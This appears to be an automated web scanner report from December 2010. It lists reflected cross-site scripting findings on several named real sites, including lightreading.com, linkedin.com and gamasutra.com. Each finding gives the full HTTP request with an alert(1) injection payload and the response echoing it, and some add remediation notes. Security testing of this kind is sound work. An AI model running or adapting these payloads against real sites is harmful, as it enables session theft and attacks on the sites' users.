GET /blog.asp?blog_sectionid=419&doc_id=180545&site=cdn&&c9a3c"><script>alert(1)</script>db793d3da66=1 HTTP/1.1 Host: www.lightreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lightreading%5Flastvisit=12%2F1%2F2010+8%3A11%3A47+PM; lightreading%5Fvisits=1; s_nr=1291273863933
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="AT&T, Cable modem termination systems (CMTSs), Cable Modems, Cisco, Comcast, Docsis, FTTx ...[SNIP]... <a href="http://www.lightreading.com/blog.asp?blog_sectionid=419&site=cdn&&c9a3c"><script>alert(1)</script>db793d3da66=1&doc_id=180545&piddl_msgorder=asc#msgs"> ...[SNIP]...
3.797. http://www.lightreading.com/document.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/document.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 701a7"><script>alert(1)</script>224ac81d999 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /document.asp?doc_id=173549&701a7"><script>alert(1)</script>224ac81d999=1 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:13:08 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET X-Pingback: http://www.lightreading.com/xmlrpc.asp Last-modified: Sat, 11 Dec 2010 23:13:04 GMT Expires: Sun, 10 Apr 2011 19:13:04 GMT Etag: s200805.p200805 Content-Length: 202346 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Cable/MSO equipment, Interactive advertising, Middleware & business support systems, TV, ...[SNIP]... <a href="http://www.lightreading.com/document.asp?doc_id=173549&701a7"><script>alert(1)</script>224ac81d999=1&piddl_msgorder=asc#msgs"> ...[SNIP]...
The value of the piddl_lg_pcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 402a9"><a%20b%3dc>7ead46494ae was submitted in the piddl_lg_pcode parameter. This input was echoed as 402a9"><a b=c>7ead46494ae in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /lg_redirect.asp?piddl_lgid_docid=201487&piddl_lg_pcode=rtcolelement402a9"><a%20b%3dc>7ead46494ae HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:16:07 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 154712 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Bandwidth, Geography, IMS, Mobile/Wireless, OSS, Policy control"> <META name="descriptio ...[SNIP]... <input type="hidden" id="piddl_lg_pcode" name="piddl_lg_pcode" value="rtcolelement402a9"><a b=c>7ead46494ae"> ...[SNIP]...
The value of the piddl_msg request parameter is copied into the HTML document as plain text between tags. The payload cf2d6<a%20b%3dc>4ff82f3cd94 was submitted in the piddl_msg parameter. This input was echoed as cf2d6<a b=c>4ff82f3cd94 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /login.asp?piddl_nexturl=http%3A%2F%2Fwww%2Elightreading%2Ecom%2Fblog%2Easp%3Fblog%5Fsectionid%3D419%26site%3Dcdn%26doc%5Fid%3D180545&piddl_msg=Please+login+to+rate+this%2Ecf2d6<a%20b%3dc>4ff82f3cd94 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:14:25 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 176873 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... <span class="red strong"> Please login to rate this.cf2d6<a b=c>4ff82f3cd94</span> ...[SNIP]...
The value of the Ticker request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34d4f'-alert(1)-'7ce94fc805c was submitted in the Ticker parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quote.asp?Account=lightreading&Page=QUOTE&Ticker=T34d4f'-alert(1)-'7ce94fc805c HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:18:28 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 200987 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ancialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Flightreading%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Account%3Dlightreading%26Page%3DQUOTE%26Ticker%3DT34d4f'-alert(1)-'7ce94fc805c&Type=page&Client=lightreading&rand=' + Math.random(); head.appendChild(script); </script> ...[SNIP]...
3.801. http://www.lightreading.com/quote.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/quote.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32721'-alert(1)-'01e5fd5bd42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quote.asp?32721'-alert(1)-'01e5fd5bd42=1 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:03:10 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 227823 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... text/javascript"; script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Flightreading%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%2632721'-alert(1)-'01e5fd5bd42%3D1&Type=page&Client=lightreading&rand=' + Math.random(); head.appendChild(script); </script> ...[SNIP]...
3.802. http://www.lightreading.com/resource-library.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/resource-library.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb3a1"><script>alert(1)</script>1677683f269 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resource-library.asp?fb3a1"><script>alert(1)</script>1677683f269=1 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:17:51 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:17:50 GMT Expires: Sun, 10 Apr 2011 19:17:50 GMT Etag: s200805.p200805 Content-Length: 189460 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... <a href="http://www.lightreading.com/resource-library.asp?fb3a1"><script>alert(1)</script>1677683f269=1&piddl_month=11&piddl_year=2010"> ...[SNIP]...
3.803. http://www.lightreading.com/topics.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightreading.com
Path:
/topics.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c046e"><script>alert(1)</script>4f099d1d545 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topics.asp?node_id=1341&c046e"><script>alert(1)</script>4f099d1d545=1 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:15:45 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:15:41 GMT Expires: Sun, 10 Apr 2011 19:15:41 GMT Etag: s200805.p200805 Content-Length: 269302 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... <a href="http://www.lightreading.com/topics.asp?node_id=1341&c046e"><script>alert(1)</script>4f099d1d545=1&piddl_archivepage_news=2#news"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ab56'-alert(1)-'e62ea93c15f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /groups5ab56'-alert(1)-'e62ea93c15f HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:9FD6K2cF_FOmRB9ssnuxVp2WmaaCztk92kPTo761VbOBPvUzydfF-2:1292112146:620c991f9b9360dc84c31de0689e6994aa0bf6c6"; Version=1; Max-Age=1799; Expires=Sun, 12-Dec-2010 00:32:25 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:7508638249675798537"; Version=1; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Set-Cookie: bcookie="v=1&35050c88-21bb-4ae8-81fb-52a1c401cb34"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 30-Dec-2078 03:16:33 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 972 Date: Sun, 12 Dec 2010 00:02:25 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1920bf45525d5f4f58455e445a4a4229a3;expires=Sun, 12-Dec-2010 00:32:10 GMT;path=/;httponly
The value of the videoId request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a6b26%3balert(1)//6156b49ff60 was submitted in the videoId parameter. This input was echoed as a6b26;alert(1)//6156b49ff60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /All_Previews.htm?videoId=626097310001a6b26%3balert(1)//6156b49ff60 HTTP/1.1 Host: www.pyr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 00:06:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 37139 Content-Type: text/html Cache-control: private
/* * feel free to edit these configurations * to modify the player experience */ config["videoId"] = 626097310001a6b26;alert(1)//6156b49ff60 //the default video loaded into the player config["videoRef"] = null; //the default video loaded into the player by ref id specified in console config["lineupId"] = null; //the default lineup load ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3ac1"-alert(1)-"9d26c73f74e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: briefingcenters.techweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ac1"-alert(1)-"9d26c73f74e Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 01:45:55 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 01:45:55 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=GVHYHWKU4GAVTQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 89129
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <!--SiteCatalyst code version: G.7. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -- ...[SNIP]...
var s_prop1=""; var s_prop2=""; var s_prop3=""; var s_prop4=""; var s_prop5=""; var s_prop6=""; var s_prop7=""; var s_prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ac1"-alert(1)-"9d26c73f74e"; var s_prop9=""; var s_prop10=""; var s_prop11=""; var s_prop12=""; var s_prop14=""; var s_prop15=""; var s_prop16=""; var s_prop19="False";
/* E-commerce Variables */ var s_campaign=""; ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c056d"-alert(1)-"f225b7c3bf8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /database_security/security/app-security/showArticle.jhtml HTTP/1.1 Host: darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c056d"-alert(1)-"f225b7c3bf8 Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 02:00:16 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Set-Cookie: PHPSESSID=4andi1thus96laev6juo0isrf5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=NGFuZGkxdGh1czk2bGFldjZqdW8waXNyZjU%3D; expires=Sun, 12-Dec-2010 02:02:16 GMT; path=/ Location: https://login.techweb.com/cas/login?service=http://www.darkreading.com/database_security/security/app-security/0&gateway=true Connection: close Content-Type: text/html Content-Length: 32675
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cfea"-alert(1)-"282bc47bf83 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /database_security/security/vulnerabilities/showArticle.jhtml HTTP/1.1 Host: darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3cfea"-alert(1)-"282bc47bf83 Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:59:55 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Set-Cookie: PHPSESSID=om92bqe7kbr2h56cl5g5quf931; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=b205MmJxZTdrYnIyaDU2Y2w1ZzVxdWY5MzE%3D; expires=Sun, 12-Dec-2010 02:01:55 GMT; path=/ Location: https://login.techweb.com/cas/login?service=http://www.darkreading.com/database_security/security/vulnerabilities/0&gateway=true Connection: close Content-Type: text/html Content-Length: 32675
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a183"-alert(1)-"5c940400821 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: gamasutra.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7a183"-alert(1)-"5c940400821 Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 01:55:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.2 ZendServer/5.0 Connection: close Content-Type: text/html Content-Length: 109267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <script t ...[SNIP]... s.prop1=""; s.prop2=""; s.prop3="Gamasustra | | GAMASUTRA"; s.prop4="GAMASUTRA"; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7a183"-alert(1)-"5c940400821"; s.prop9=""; s.prop10=""; s.prop13="http://www.gamasutra.com/index.php"; /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; s.events="event5"; s.products=""; s.purchaseID="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1004"-alert(1)-"e4efa87e6e4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.contentinople.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e1004"-alert(1)-"e4efa87e6e4 Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:32:16 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 134188 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Advertising, AOL, Apple, Audio, Babelgum, Content Delivery Network (CDN), Disney, Digital ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e1004"-alert(1)-"e4efa87e6e4"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbac"-alert(1)-"cbed3a67a32 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author.asp HTTP/1.1 Host: www.contentinople.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fbbac"-alert(1)-"cbed3a67a32 Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:32:07 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 134182 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Advertising, AOL, Apple, Audio, Babelgum, Content Delivery Network (CDN), Disney, Digital ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fbbac"-alert(1)-"cbed3a67a32"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2f25"-alert(1)-"37a5d549da5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author.asp?section_id=440&doc_id=178256 HTTP/1.1 Host: www.contentinople.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d2f25"-alert(1)-"37a5d549da5 Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:32:55 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET X-Pingback: http://www.lightreading.com/xmlrpc.asp Content-Length: 93342 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Advertising, AOL, Apple, Audio, Babelgum, Content Delivery Network (CDN), Disney, Digital ...[SNIP]... Targeted Ad Product"; s.prop4="Canoe Shelves Targeted Ad Product"; s.prop5=""; s.prop6=""; s.prop7="Jeff Baumgartner"; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d2f25"-alert(1)-"37a5d549da5"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="20090618";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88437"-alert(1)-"b49e17ca852 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
